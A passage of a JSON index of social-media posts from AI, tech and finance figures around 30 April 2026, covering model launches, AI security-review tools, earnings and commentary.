Tech今年AI领域$7000亿投资是历史上最大的资本错配"}]} + +推文索引(按 url 可回填 handle/date/text): +[{"handle": "sama", "name": "Sam Altman", "published_at": "2026-05-01T01:17:03+00:00", "title": "artificial goblin intelligence\n\nachieved", "url": "https://x.com/sama/status/2050021650641695108"}, {"handle": "GaryMarcus", "name": "Gary Marcus", "published_at": "2026-05-01T01:13:13+00:00", "title": "I dunno. The competition is really tight. But Zuck certainly a top contender! Who’s your “favorite”?", "url": "https://x.com/GaryMarcus/status/2050020685733564459"}, {"handle": "GaryMarcus", "name": "Gary Marcus", "published_at": "2026-05-01T01:11:09+00:00", "title": "Most evil person in AI", "url": "https://x.com/GaryMarcus/status/2050020164612104604"}, {"handle": "GaryMarcus", "name": "Gary Marcus", "published_at": "2026-05-01T01:09:21+00:00", "title": "Once again IP thieves accusing other IP thieves of IP thievery! \n\nThe nerve!", "url": "https://x.com/GaryMarcus/status/2050019713409814672"}, {"handle": "jason", "name": "Jason Calacanis", "published_at": "2026-05-01T01:04:19+00:00", "title": "😂😂😂@ATLHawks", "url": "https://x.com/jason/status/2050018446616797370"}, {"handle": "pmarca", "name": "Marc Andreessen", "published_at": "2026-05-01T01:01:26+00:00", "title": "We’re finally signing. https://www.bizjournals.com/sanjose/news/2017/06/24/vcs-rally-around-decency-pledge-after-silicon.html", "url": "https://x.com/pmarca/status/2050017717592510568"}, {"handle": "HarryStebbings", "name": "Harry Stebbings", "published_at": "2026-05-01T00:55:00+00:00", "title": "Why Dario at Anthropic has such a hard job predicting compute demands?\n\n\"The stakes are enormous and the margin for error is tiny.\n\nFor every dollar of revenue, you may need $4–5 in upfront compute investment.\n\nIf you underinvest, you cannot meet demand. If you overinvest, you ar", "url": "https://x.com/HarryStebbings/status/2050016099606118504"}, {"handle": "berryxia", "name": "Berryxia", "published_at": "2026-05-01T00:52:14+00:00", "title": "R to @berryxia: 项目地址: https://github.com/OpenGeometry-io/OpenGeometry官网体验: https://opengeometry.io/", "url": "https://x.com/berryxia/status/2050015406140903487"}, {"handle": "berryxia", "name": "Berryxia", "published_at": "2026-05-01T00:52:14+00:00", "title": "🚀 Geometry 终于成为 AI 在建筑领域的缺失关键层!\n@Bootsblac 用 OpenGeometry 把 Text → Floorplans → CAD → Render 完整打通,精度控制成为可能!\n\n1. 从文本/平面图直接生成精准 BREP CAD 模型\n2. Three.js 实时渲染 + Google AI 驱动,全流程端到端\n3.完整开源可用", "url": "https://x.com/berryxia/status/2050015402647027808"}, {"handle": "jason", "name": "Jason Calacanis", "published_at": "2026-05-01T00:38:13+00:00", "title": "No comment", "url": "https://x.com/jason/status/2050011874989649946"}, {"handle": "jason", "name": "Jason Calacanis", "published_at": "2026-05-01T00:38:00+00:00", "title": "Whoever is running the hawks social is a savage 😂", "url": "https://x.com/jason/status/2050011821914865685"}, {"handle": "runes_leo", "name": "Leo", "published_at": "2026-05-01T00:38:00+00:00", "title": "38k 星的 skill 仓库。\n\n上周抄了 1 个 grill-me,今天又加了另外 2 个。\n\n一个是 /tdd 思路。\n\n动手前先写一行——跑完应该长啥样。\n对得上才往下走。\n\n加进自己的自检流程,只用于策略代码或 API 调用那类——\n跑了对不对要 grep log 才知道的场景。\n\nskill 没装,精华抄过来了。\n\n另一个是他 SKILL.md 的渐进式骨架。\n照着写了个模板,下次新写 skill 直接套。\n\n剩下 13 件翻了一遍,没一件用得上——\n他全围绕代码工程,我这边的栈错位太大。\n\n差别挺有意思:\n\n他走工程师纯度路线,16 个 s", "url": "https://x.com/runes_leo/status/2050011821352829116"}, {"handle": "GaryMarcus", "name": "Gary Marcus", "published_at": "2026-05-01T00:27:22+00:00", "title": "Tokenmaxxing is stupid. \n\nChange my mind?", "url": "https://x.com/GaryMarcus/status/2050009144846119068"}, {"handle": "jason", "name": "Jason Calacanis", "published_at": "2026-05-01T00:26:51+00:00", "title": "RT by @Jason: Image", "url": "https://x.com/jason/status/2050009016105930837"}, {"handle": "pmarca", "name": "Marc Andreessen", "published_at": "2026-05-01T00:22:01+00:00", "title": "Apocalypses (apocalypsii?) are fungible.", "url": "https://x.com/pmarca/status/2050007800882122833"}, {"handle": "jason", "name": "Jason Calacanis", "published_at": "2026-05-01T00:20:30+00:00", "title": "THIS IS INSANE 🔥\n\nPURE DOMINATION 🤦\n\nATL DOES HAVE SOME GREAT RAPPERS 😂😂😂", "url": "https://x.com/jason/status/2050007416964591880"}, {"handle": "AravSrinivas", "name": "Aravind Srinivas", "published_at": "2026-05-01T00:18:54+00:00", "title": "RT by @AravSrinivas: $AAPL CFO:\n\n“Leading AI developers like Perplexity are choosing Mac as their preferred platform to build enterprise-grade AI assistants that power autonomous agents and boost workplace productivity.”", "url": "https://x.com/AravSrinivas/status/2050007015616135365"}, {"handle": "pmarca", "name": "Marc Andreessen", "published_at": "2026-05-01T00:09:03+00:00", "title": "Concerning. https://nypost.com/2026/04/30/business/inside-the-ai-doom-machine-and-who-is-benefiting-from-it/", "url": "https://x.com/pmarca/status/2050004538216886756"}, {"handle": "berryxia", "name": "Berryxia", "published_at": "2026-05-01T00:08:27+00:00", "title": "OpenRouter 又上了匿名新模型Owl Alpha!\n\n 1M 上下文,强大的工具调用能力!\n猜猜他是谁家的哈哈😂", "url": "https://x.com/berryxia/status/2050004383971282952"}, {"handle": "berryxia", "name": "Berryxia", "published_at": "2026-05-01T00:00:12+00:00", "title": "兄弟们!老马家的Grok Image终于……\n\nGrok Image Agent 网页版Beta 版本已经上线,目前应该是给付费用户灰度推送中!\n\n这是一款全能创意Agent,可在无限开放画布上独立创作。\n\nGrok Agent在同一工作区内,自动完成规划→生成→编辑→迭代的全流程创作。\n\n只需下达指令,即可观看它在无缝衔接的工作区中,自动完成规划、生成、编辑与迭代:\n\n• 🎬 “生成一部 1 分钟电影级短片”\n\n• 📚 “创作一整套漫画”\n\n• 🛍️ “制作用户生成内容(UGC)产品故事”\n\n这是从简单提示词到端到端创意制作的真正飞跃。\n\n这是 Gro", "url": "https://x.com/berryxia/status/2050002308759695561"}, {"handle": "berryxia", "name": "Berryxia", "published_at": "2026-04-30T23:56:28+00:00", "title": "这个小哥读完Anthropic关于智能体AI的博客后,我梳理出一套心智模型,用来理解并拆解智能体AI架构的设计逻辑。\n\n设定任务与目标\n\n明确你希望AI智能体需要完成、达成的具体事项。\n\n1. 编排层 Orchestration layer\n相当于整套系统的控制面板,负责全局调度与流程统筹。\n\n2. 智能体层 Agents layer\n由多个专用/通用智能体组成,也就是多智能体分工协作架构。\n\n3. 工具层 Tools\n为智能体提供各类能力支撑,例如网页搜索、数据库查询、第三方API调用等。\n\n4. 记忆层 Memory\n系统的“大脑”,负责存储短期记忆", "url": "https://x.com/berryxia/status/2050001371307646977"}, {"handle": "berryxia", "name": "Berryxia", "published_at": "2026-04-30T23:46:56+00:00", "title": "刚刚看到Claude Security 现已进入公测阶段!可以让Claude 帮你检查漏洞了啊!\n\n目前已经内置于网页版的 Claude Code 中。\n\n只需将其指向一个代码仓库,即可获得经过验证的漏洞发现结果,并在 正在编写代码的同一位置修复它们!\n\n这个功能挺实用,什么时候可以直接cc里可以用。\n\n地址:https://claude.com/product/claude-security", "url": "https://x.com/berryxia/status/2049998972484567491"}, {"handle": "GaryMarcus", "name": "Gary Marcus", "published_at": "2026-04-30T23:46:40+00:00", "title": "wow. incredible.", "url": "https://x.com/GaryMarcus/status/2049998902452183488"}, {"handle": "berryxia", "name": "Berryxia", "published_at": "2026-04-30T23:41:23+00:00", "title": "你看看大模型有多重?\n这个挺有意思的😂", "url": "https://x.com/berryxia/status/2049997574229446812"}, {"handle": "GaryMarcus", "name": "Gary Marcus", "published_at": "2026-04-30T23:36:38+00:00", "title": "this is … odd. \n\nthe whole problem with agentic code is that people wind up with hard to debug redundancies, security holes, deleted databases, etc., which is exactly why you need roadmaps and code reviews, with AI-written code. \n\nI am with @Grady_Booch on this one (and almost e", "url": "https://x.com/GaryMarcus/status/2049996377678057717"}, {"handle": "berryxia", "name": "Berryxia", "published_at": "2026-04-30T23:34:02+00:00", "title": "Claude& Blender 🐮🍺", "url": "https://x.com/berryxia/status/2049995723580850235"}, {"handle": "jason", "name": "Jason Calacanis", "published_at": "2026-04-30T23:30:42+00:00", "title": "Very quiet @ATLHawks 🤫", "url": "https://x.com/jason/status/2049994885185384483"}, {"handle": "berryxia", "name": "Berryxia", "published_at": "2026-04-30T23:30:42+00:00", "title": "2026年你必须了解的6个大语言模型(LLM)知识库专业术语!\n\n(大多数团队至少缺失其中3项,这会让他们的智能AI代理付出代价)\n\n1. LLM Knowledge Base 大语言模型知识库\n\n一种能够让大语言模型接收原始资料、整理成结构化维基文档,并通过自有索引检索来回答问题的系统。安德烈·卡尔帕西曾为自己搭建过一套。该技术的难点在于:搭建一套能适配整个团队协同使用的知识库。\n\n2. Continuous Ingestion 持续数据摄取\n\n自动从所有日常工作工具中同步信息,包括即时通讯软件、客户关系管理系统、会议记录、文档资料等,全程无需人工维护", "url": "https://x.com/berryxia/status/2049994885764419789"}, {"handle": "jason", "name": "Jason Calacanis", "published_at": "2026-04-30T23:29:59+00:00", "title": "RT by @Jason: Wow @Jason wasn’t kidding these Toyota Alphard vans are incredible. Why don’t they sell these in America?", "url": "https://x.com/jason/status/2049994707061911758"}, {"handle": "berryxia", "name": "Berryxia", "published_at": "2026-04-30T23:25:26+00:00", "title": "兄弟们!嘴撸360 全景沉浸式体验小游戏!时代来了!\n\n直接把这个Prompt丢给Flowith然后和Codex链接,图片直接整成360度场景图!\n\nPrompt:👇\n\n1. 给图像Agent一个简单的提示,让它研究 AI 公司吉祥物并生成一个 360° 动物园。\n2. 将全景图输入你的 Codex 以获得 3D 视图。", "url": "https://x.com/berryxia/status/2049993558577619280"}, {"handle": "berryxia", "name": "Berryxia", "published_at": "2026-04-30T23:21:37+00:00", "title": "这几天使用Cursor 就发现在最后一步会有一个bug检测什么的的执行MCP一直提示我。\n\n现在Curosr针对企业和Team版本有专门的针对安全漏洞做了审核的Agent!", "url": "https://x.com/berryxia/status/2049992598639755395"}, {"handle": "berryxia", "name": "Berryxia", "published_at": "2026-04-30T23:19:35+00:00", "title": "Gemini Embedding 2 已正式发布!\nRAG 知识库的应用又可以支持的更好了。", "url": "https://x.com/berryxia/status/2049992087547130254"}, {"handle": "berryxia", "name": "Berryxia", "published_at": "2026-04-30T23:17:56+00:00", "title": "苹果内部正在使用一款名为 AFM Playground 的应用程序,它看起来与 ChatGPT 非常相似,但使用的是苹果的 Foundation Models。\n\n不知道能搞出来个啥?", "url": "https://x.com/berryxia/status/2049991672155750500"}, {"handle": "berryxia", "name": "Berryxia", "published_at": "2026-04-30T23:16:18+00:00", "title": "在这场访谈中,Karpathy 分享了他作为程序员在 AI 时代的亲身经历与深刻洞见。\n\n他表示,2025 年 12 月成为他的个人转折点:AI 生成的代码从“有帮助但常需修改”转变为“直接可用”,他已记不清上一次亲自修改 AI 输出是什么时候,从此进入\n“Vibe Coding”的状态。 \n\nKarpathy 将软件开发划分为三个阶段:\n\nSoftware 1.0 是传统显式代码编程,Software 2.0 是神经网络时代,而 Software 3.0 则是大语言模型时代。\n\n在 Software 3.0 中,编程的核心不再是逐行编写代码,而是通过", "url": "https://x.com/berryxia/status/2049991262934380898"}, {"handle": "berryxia", "name": "Berryxia", "published_at": "2026-04-30T23:06:04+00:00", "title": "这一波GPT- Image-2 出圈的原因感觉更多的是将其结合游戏真实的UI设计融合且效果出奇好。\n\n省token简单的prompt就可以完成,开发3D游戏也可以快速打好草稿。", "url": "https://x.com/berryxia/status/2049988686788558992"}, {"handle": "berryxia", "name": "Berryxia", "published_at": "2026-04-30T23:03:19+00:00", "title": "David Sacks 在 X 平台上发布了一条推文,对 AI Security Institute 刚刚发布的公告进行了回应。\n\nAI Security Institute 宣布 OpenAI 的 GPT-5.5 模型(cyber 版本)成功完成了他们设计的“多步网络攻击模拟”。\n\n也成为第二个能端到端完成整个攻击链的模型(第一个是 Anthropic 的 Mythos)。 \n\n在推文中,David Sacks 表示,是时候揭开 Mythos 的神秘面纱了。\n\n他强调,Mythos 并非什么魔法,也不是末日武器,它只是众多能够自动化网络安全任务的模型", "url": "https://x.com/berryxia/status/2049987993193402677"}, {"handle": "jason", "name": "Jason Calacanis", "published_at": "2026-04-30T23:02:00+00:00", "title": "RT by @Jason: What if you had a live fact-checker and a devil's advocate running in your ear during every podcast, call, or stream?\n\nI built that. One hour. One Claude Code session.\n\nGary catches bad stats and wrong dates. Rex pushes back on everything.\n\nOpen source repo in the t", "url": "https://x.com/jason/status/2049987662526992390"}, {"handle": "berryxia", "name": "Berryxia", "published_at": "2026-04-30T22:57:08+00:00", "title": "𝕏 网页端更新Cashtags 功能,可以给每个股票提供实时图表。", "url": "https://x.com/berryxia/status/2049986437194621357"}, {"handle": "berryxia", "name": "Berryxia", "published_at": "2026-04-30T22:53:19+00:00", "title": "Stripe 重磅推出 Link CLI!\nAgent 终于能安全花钱了:单次凭证 + 同步人工审批,Claude 买礼物都不怕乱花!\n\n1. 一行命令让 Agent 创建一次性支付凭证\n2. 每次消费你都收到实时推送并用 FaceID 确认\n3. 彻底解决 Agent 支付信任问题,安全又方便\n4. Claude 已经实测:自己挑礼物上 Gumroad 下单,完美闭环\n\nAgent 时代支付基础设施来了,开发者直接告诉你的 Agent 去用!\n\n项目地址:\nhttps://github.com/stripe/link-cli", "url": "https://x.com/berryxia/status/2049985476334100833"}, {"handle": "jason", "name": "Jason Calacanis", "published_at": "2026-04-30T22:32:57+00:00", "title": "For the record, I got a couple of milly at JPMorgan — and I think Lorna is innocent of all charges.", "url": "https://x.com/jason/status/2049980353155064279"}, {"handle": "jason", "name": "Jason Calacanis", "published_at": "2026-04-30T22:30:40+00:00", "title": "What’s good Atlanta", "url": "https://x.com/jason/status/2049979777864331542"}, {"handle": "jason", "name": "Jason Calacanis", "published_at": "2026-04-30T22:16:09+00:00", "title": "Hardwood in the ATL", "url": "https://x.com/jason/status/2049976123891552679"}, {"handle": "jason", "name": "Jason Calacanis", "published_at": "2026-04-30T22:15:21+00:00", "title": "Real life! With Jose! @AlvaradoJose15", "url": "https://x.com/jason/status/2049975924238569627"}, {"handle": "charliebilello", "name": "Charlie Bilello", "published_at": "2026-04-30T21:51:45+00:00", "title": "Q1 Revenue Growth, YoY % Change...\nMeta $META: +33%\nGoogle $GOOGL: +22%\nMicrosoft $MSFT: +18%\nApple $AAPL: +17%\nAmazon $AMZN: +17%\nNetflix $NFLX: +16%\nTesla $TSLA: +16%\nS&P 500 $SPY: +10%", "url": "https://x.com/charliebilello/status/2049969984432914819"}, {"handle": "jason", "name": "Jason Calacanis", "published_at": "2026-04-30T21:33:17+00:00", "title": "Actually, for Uber Black, Blacklane and private drivers this is standard (I use all three, all the time). \n\nFor UberX? \n\nSure, they would need to be convinced.\n\nin a world moving to autonomy, the opportunity for humans is to add security, tasks, waiting and valet-like services to", "url": "https://x.com/jason/status/2049965338368819443"}, {"handle": "jason", "name": "Jason Calacanis", "published_at": "2026-04-30T21:30:21+00:00", "title": "Who made this?!", "url": "https://x.com/jason/status/2049964597403140486"}, {"handle": "pmarca", "name": "Marc Andreessen", "published_at": "2026-04-30T21:28:45+00:00", "title": "Valid.", "url": "https://x.com/pmarca/status/2049964195954020800"}, {"handle": "jason", "name": "Jason Calacanis", "published_at": "2026-04-30T21:27:00+00:00", "title": "San Francisco politicians and their constituents enable this suffering. \n\nThey are the cause of it, because they can stop it instantly. \n\nToday, tomorrow and every one of the last 1,000 days this has happened. \n\nFentanyl is a super drug and we should have zero tolerance for the d", "url": "https://x.com/jason/status/2049963757036536190"}, {"handle": "jason", "name": "Jason Calacanis", "published_at": "2026-04-30T21:23:23+00:00", "title": "Please stop.", "url": "https://x.com/jason/status/2049962845849170234"}, {"handle": "charliebilello", "name": "Charlie Bilello", "published_at": "2026-04-30T21:16:00+00:00", "title": "Apple revenues increased 17% over the last year to a new Q1 record of $111 billion. Net Income grew 19% year-over-year to new Q1 record of $30 billion. Gross margins increased to 49% (from 47% a year ago), the highest margin in company history. $AAPL\n\nhttps://bilello.blog/newslet", "url": "https://x.com/charliebilello/status/2049960986468069507"}, {"handle": "GaryMarcus", "name": "Gary Marcus", "published_at": "2026-04-30T21:13:28+00:00", "title": "RT by @GaryMarcus: Cuando sucede un problema en un puesto automatizado por la IA... ¿Quién es el responsable?", "url": "https://x.com/GaryMarcus/status/2049960351198839176"}, {"handle": "GaryMarcus", "name": "Gary Marcus", "published_at": "2026-04-30T20:59:29+00:00", "title": "Who is accountable? \n\nthe latest from @marketoonist", "url": "https://x.com/GaryMarcus/status/2049956829019447683"}, {"handle": "charliebilello", "name": "Charlie Bilello", "published_at": "2026-04-30T20:57:41+00:00", "title": "Incredible: Amazon's AWS revenue over the last 12 months ($137 billion) was higher than the revenue of 472 companies in the S&P 500. $AMZN\n\nhttps://bilello.blog/newsletter", "url": "https://x.com/charliebilello/status/2049956378660200794"}, {"handle": "charliebilello", "name": "Charlie Bilello", "published_at": "2026-04-30T20:47:59+00:00", "title": "Amazon Revenue (Billions)\n2026 (est): 810\n2025: 717\n2024: 638\n2023: 575\n2022: 514\n2021: 470\n2020: 386\n2019: 281\n2018: 233\n2017: 178\n2016: 136\n2015: 107\n2014: 89\n2013: 74\n2012: 61\n2011: 48\n2010: 34\n2009: 25\n2008: 19\n2007: 15\n2006: 11\n\n24% annualized growth over the last 20 years", "url": "https://x.com/charliebilello/status/2049953936212217973"}, {"handle": "GaryMarcus", "name": "Gary Marcus", "published_at": "2026-04-30T20:43:38+00:00", "title": "Dear @elonmusk,\n\nIf you still genuinely care about AI safety, you can’t let the Trump administration leave the AI industry almost entirely unregulated. \n\nYou just can’t.\n\n- Gary", "url": "https://x.com/GaryMarcus/status/2049952842010751095"}, {"handle": "jason", "name": "Jason Calacanis", "published_at": "2026-04-30T20:43:29+00:00", "title": "Pregame!", "url": "https://x.com/jason/status/2049952806451171669"}, {"handle": "HarryStebbings", "name": "Harry Stebbings", "published_at": "2026-04-30T20:39:00+00:00", "title": "Multi-year contracts don't matter. \n\n\"Deferred churn is still churn, it just shows up later.\n\nLong contracts do not mean customers are loyal, they just delay the moment they leave.\n\nIf a better solution comes along, they will switch when the contract ends.\" @jasonlk\n\nDoes getting", "url": "https://x.com/HarryStebbings/status/2049951674891203065"}, {"handle": "charliebilello", "name": "Charlie Bilello", "published_at": "2026-04-30T20:35:03+00:00", "title": "Amazon revenues increased 17% over the last year to a new Q1 record of $182 billion. Net Income increased 77% YoY to $30 billion, the highest quarterly profit in company history. Operating margins increased to a record 13.4% from 12.0% a year ago. $AMZN", "url": "https://x.com/charliebilello/status/2049950680236827140"}, {"handle": "jason", "name": "Jason Calacanis", "published_at": "2026-04-30T20:32:53+00:00", "title": "The everything app! Go @uber go!", "url": "https://x.com/jason/status/2049950138735407393"}, {"handle": "jason", "name": "Jason Calacanis", "published_at": "2026-04-30T20:29:30+00:00", "title": "Enjoying giving bounties in the vibecoding era \n\nLooking for someone to build annotated dot com in this podcast contest \n\nWinner gets $5k \n\nGLHF!", "url": "https://x.com/jason/status/2049949284267590094"}, {"handle": "sama", "name": "Sam Altman", "published_at": "2026-04-30T20:16:55+00:00", "title": "big upgrade for codex today!\n\ntry it for non-coding computer work.", "url": "https://x.com/sama/status/2049946120441520624"}, {"handle": "sama", "name": "Sam Altman", "published_at": "2026-04-30T20:12:24+00:00", "title": "it does seem cool", "url": "https://x.com/sama/status/2049944981750833659"}, {"handle": "GaryMarcus", "name": "Gary Marcus", "published_at": "2026-04-30T19:56:39+00:00", "title": "somebody feels very rejected 🤷‍♂️", "url": "https://x.com/GaryMarcus/status/2049941019077247438"}, {"handle": "sama", "name": "Sam Altman", "published_at": "2026-04-30T19:23:47+00:00", "title": "RT by @sama: Computer Use runs this use case 42% faster in today's Codex app update.", "url": "https://x.com/sama/status/2049932746567598472"}, {"handle": "jason", "name": "Jason Calacanis", "published_at": "2026-04-30T19:18:32+00:00", "title": "RT by @Jason: J-Cal is offering a $5K bounty to whoever can execute his idea for annotated .com! Think you have what it takes? 🧵\n\n@Jason", "url": "https://x.com/jason/status/2049931426972180820"}, {"handle": "sama", "name": "Sam Altman", "published_at": "2026-04-30T19:08:00+00:00", "title": "RT by @sama: It's never been easier to do everyday work with Codex.\n\nChoose your role, connect the apps you use every day, and try suggested prompts.\n\nCodex helps with everything from research and planning to docs, slides, spreadsheets, and more.", "url": "https://x.com/sama/status/2049928776147230886"}, {"handle": "cursor_ai", "name": "Cursor", "published_at": "2026-04-30T18:58:07+00:00", "title": "R to @cursor_ai: We’re continuing to improve the runtime, harness, and models powering Cursor Security Review for a strong out-of-the-box experience.\n\nSecurity agents draw from your existing usage pool. \n\nLearn more: http://cursor.com/docs/security-review", "url": "https://x.com/cursor_ai/status/2049926287439929475"}, {"handle": "cursor_ai", "name": "Cursor", "published_at": "2026-04-30T18:58:06+00:00", "title": "R to @cursor_ai: Customize these Cursor-managed security agents to match your team’s requirements.\n\nAdjust triggers, add your own instructions, give them custom tooling, and choose how outputs are shared.", "url": "https://x.com/cursor_ai/status/2049926285518848093"}, {"handle": "cursor_ai", "name": "Cursor", "published_at": "2026-04-30T18:58:06+00:00", "title": "Cursor Security Review is now available for Teams and Enterprise plans.\n\nRun two types of always-on agents:\n1. Security Reviewer checks every PR for vulnerabilities and leaves comments.\n2. Vulnerability Scanner runs scheduled scans of your codebase and posts findings in Slack.", "url": "https://x.com/cursor_ai/status/2049926283061035254"}, {"handle": "realNyarime", "name": "奶昔", "published_at": "2026-04-30T18:49:33+00:00", "title": "还得是投行的女高管,操控股价有水平的", "url": "https://x.com/realNyarime/status/2049924132037693573"}, {"handle": "svwang1", "name": "王川(硅谷)", "published_at": "2026-04-30T18:43:10+00:00", "title": "R to @Svwang1: 李克用在 884年消灭黄巢的战斗中起到决定性作用,但在回师路上的“上元驿之变”中差点被朱温暗算杀害。", "url": "https://x.com/svwang1/status/2049922524839018604"}, {"handle": "svwang1", "name": "王川(硅谷)", "published_at": "2026-04-30T18:36:57+00:00", "title": "按照这个研究,李克用的基因大概 53%来自东北亚,47% 来自西亚到欧洲的大草原 (western steppe). 按照Ai 的说法,后者的基因主要在芬兰人和瑞典人中居多。\n\n李克用的儿子李存勖 (后唐庄宗)的子嗣,在 926年的兴教门之变后都被杀光,所以估计现在还带着他的基因的,是李存勖的兄弟的后代。", "url": "https://x.com/svwang1/status/2049920960724427165"}, {"handle": "pmarca", "name": "Marc Andreessen", "published_at": "2026-04-30T18:34:10+00:00", "title": "Co-sign.", "url": "https://x.com/pmarca/status/2049920259432513702"}, {"handle": "DavidSacks", "name": "David Sacks", "published_at": "2026-04-30T18:34:10+00:00", "title": "RT by @DavidSacks: Co-sign.", "url": "https://x.com/DavidSacks/status/2049920259432513702"}, {"handle": "charliebilello", "name": "Charlie Bilello", "published_at": "2026-04-30T18:34:04+00:00", "title": "Gas prices in California have moved up above $6.00/gallon, 40% higher than the US national average ($4.30/gallon).", "url": "https://x.com/charliebilello/status/2049920236002963504"}, {"handle": "eladgil", "name": "Elad Gil", "published_at": "2026-04-30T18:31:25+00:00", "title": "🔥", "url": "https://x.com/eladgil/status/2049919569134047726"}, {"handle": "charliebilello", "name": "Charlie Bilello", "published_at": "2026-04-30T18:08:56+00:00", "title": "The S&P 500 just crossed above 7,200 for the first time. A year ago it was at 5,600. 5 years ago it was at 4,200. 10 years ago it was at 2,100. $SPX", "url": "https://x.com/charliebilello/status/2049913908861792603"}, {"handle": "GaryMarcus", "name": "Gary Marcus", "published_at": "2026-04-30T17:49:50+00:00", "title": "John Oliver @LastWeekTonight slays a pile of greedy tech CEOs, gives props to @GaryMarcus 😻\n\nThe tides are changing, and other folks like @wendyweeww are speaking out in support.", "url": "https://x.com/GaryMarcus/status/2049909103129251864"}, {"handle": "eladgil", "name": "Elad Gil", "published_at": "2026-04-30T17:48:18+00:00", "title": "RT by @eladgil: Your honour, I think this should be allowed.", "url": "https://x.com/eladgil/status/2049908719782334528"}, {"handle": "pmarca", "name": "Marc Andreessen", "published_at": "2026-04-30T17:45:25+00:00", "title": "RT by @pmarca: It’s time to demystify Mythos. \n\nMythos is not magic. It’s not a doomsday device. It’s the first of many models that can automate cyber tasks (just like coding). \n\nOpenAI’s GPT-5.5-cyber can now do the same. And all the frontier models (including those from China) ", "url": "https://x.com/pmarca/status/2049907993588769006"}, {"handle": "DavidSacks", "name": "David Sacks", "published_at": "2026-04-30T17:45:25+00:00", "title": "It’s time to demystify Mythos. \n\nMythos is not magic. It’s not a doomsday device. It’s the first of many models that can automate cyber tasks (just like coding). \n\nOpenAI’s GPT-5.5-cyber can now do the same. And all the frontier models (including those from China) will be there w", "url": "https://x.com/DavidSacks/status/2049907993588769006"}, {"handle": "karpathy", "name": "Andrej Karpathy", "published_at": "2026-04-30T17:43:06+00:00", "title": "This is the the quote I've been citing a lot recently.", "url": "https://x.com/karpathy/status/2049907410303865030"}, {"handle": "HarryStebbings", "name": "Harry Stebbings", "published_at": "2026-04-30T17:35:00+00:00", "title": "What the public markets are getting wrong about the SaaS-pocalypse\n\n\"The public markets are directionally right, but missing the real shift.\n\nThe threat is not AI tools themselves, it is the agents deciding what tools to use.\n\nWinners will be the companies' agents choose to integ", "url": "https://x.com/HarryStebbings/status/2049905369963745470"}, {"handle": "GaryMarcus", "name": "Gary Marcus", "published_at": "2026-04-30T17:32:47+00:00", "title": "OpenAI’s lawyer plays dirty. Why I am not surprised?", "url": "https://x.com/GaryMarcus/status/2049904811165008099"}, {"handle": "sama", "name": "Sam Altman", "published_at": "2026-04-30T17:29:15+00:00", "title": "lisan say more mean things about us you're being too nice", "url": "https://x.com/sama/status/2049903925311267311"}, {"handle": "karpathy", "name": "Andrej Karpathy", "published_at": "2026-04-30T17:28:50+00:00", "title": "Fireside chat at Sequoia Ascent 2026 from a ~week ago. Some highlights:\n\nThe first theme I tried to push on is that LLMs are about a lot more than just speeding up what existed before (e.g. coding). Three examples of new horizons:\n\n1. menugen: an app that can be fully engulfed by", "url": "https://x.com/karpathy/status/2049903821095354523"}, {"handle": "GaryMarcus", "name": "Gary Marcus", "published_at": "2026-04-30T17:23:08+00:00", "title": "Wild graph from @Evident_HQ:", "url": "https://x.com/GaryMarcus/status/2049902385808744558"}, {"handle": "cursor_ai", "name": "Cursor", "published_at": "2026-04-30T17:19:22+00:00", "title": "Our agent harness makes models inside Cursor faster, smarter, and more token-efficient.\n\nHere's how we test improvements to the harness, monitor and repair degradations, and customize it for different models.\n\nhttp://cursor.com/blog/continually-improving-agent-harness", "url": "https://x.com/cursor_ai/status/2049901436918436249"}, {"handle": "charliebilello", "name": "Charlie Bilello", "published_at": "2026-04-30T17:05:02+00:00", "title": "Global Central Bank Update:\n-Brazil cut rates for the second month in a row, 25 bps move down to 14.50%.", "url": "https://x.com/charliebilello/status/2049897830567862624"}, {"handle": "lxfater", "name": "铁锤人", "published_at": "2026-04-30T17:01:35+00:00", "title": "GPT-5.5的网络攻击能力好像比前段时间吹上天的Mythos\n\n没差这么多呀😂", "url": "https://x.com/lxfater/status/2049896961382203667"}, {"handle": "realNyarime", "name": "奶昔", "published_at": "2026-04-30T17:00:21+00:00", "title": "这下不止中国大陆,连香港到美的互联也要玩烂了!\nFCC表决撤销中资运营商的一揽子授权之提议,目的是堵住 2022 年的法律漏洞:即使「中资运营商」的通信牌照被撤销,它们仍可根据一揽子授权(Blanket Authority)自动获得美国国内的州际电信服务资质\n\n会议中最激进的部分是关于禁止互联(Interconnection)的讨论,即讨论将从物理上禁止Verizon、AT&T等美资运营商与中资运营商的互联。如此一来,不仅电信、联通、移动、中信的美国电信业务被踢出局,还会连带IDC、IXP、PoP一同被赶这次行动会祭出「股权穿透」大招,即电信、联通、移动", "url": "https://x.com/realNyarime/status/2049896651989614721"}, {"handle": "Pluvio9yte", "name": "雪踏乌云", "published_at": "2026-04-30T16:37:50+00:00", "title": "OpenAI 发了篇博客复盘自家模型一个挺有意思的\"口癖哥布林\"问题,\n\n从 GPT-5.1 起,他们的模型莫名其妙开始爱用 goblin、gremlin 这些怪物词打比方,越往后越泛滥。\n\nOpenAI 一路扒数据,定位到是训练 \"Nerdy\"(书呆子气)人格时,奖励信号意外地给\"用怪物词做比喻\"加了高分。\n\n具体证据:\n1. GPT-5.1 上线后,ChatGPT 里 goblin 用量涨了 175%,gremlin 涨了 52%。\n\n2. Nerdy 人格只占所有回答的 2.5%,却贡献了 66.7% 的 goblin。76.2% 的数据集里,带怪", "url": "https://x.com/Pluvio9yte/status/2049890985631768653"}, {"handle": "GaryMarcus", "name": "Gary Marcus", "published_at": "2026-04-30T16:35:11+00:00", "title": "would be very surprising if he didn’t. let’s see who can spot them first.", "url": "https://x.com/GaryMarcus/status/2049890318200570310"}, {"handle": "realNyarime", "name": "奶昔", "published_at": "2026-04-30T16:33:28+00:00", "title": "N26关门了,中港澳台全部不接受", "url": "https://x.com/realNyarime/status/2049889887684616218"}, {"handle": "GoSailGlobal", "name": "Jason Zhu", "published_at": "2026-04-30T16:25:11+00:00", "title": "👀回顾来时路\n\n从这条推文开始,进行了9个月的日更推文\n\n经历了内容方向的摸索、带人X增长与知识付费和自身X增长矛盾的时期、B端业务探索\n\n算是找到了点出路\n\n离职的可以参考下,在职的也要掂量下", "url": "https://x.com/GoSailGlobal/status/2049887802863583240"}, {"handle": "AndrewYNg", "name": "Andrew Ng", "published_at": "2026-04-30T16:21:35+00:00", "title": "Pinned: How we prompt AI is very different in 2026 than 2022 when ChatGPT came out.\n\nI'm teaching a new course, AI Prompting for Everyone, to help you become an AI power user — whatever your current skill level.\n\nIt covers skills that apply across ChatGPT, Gemini, Claude, and oth", "url": "https://x.com/AndrewYNg/status/2049886895530967534"}, {"handle": 